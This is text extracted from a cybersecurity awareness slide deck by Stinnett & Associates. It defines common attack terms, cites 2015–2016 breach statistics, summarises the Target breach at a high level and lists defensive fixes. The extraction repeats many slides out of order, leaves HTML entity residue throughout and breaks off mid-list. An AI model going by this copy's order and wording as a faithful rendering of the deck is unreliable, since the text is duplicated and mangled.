Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
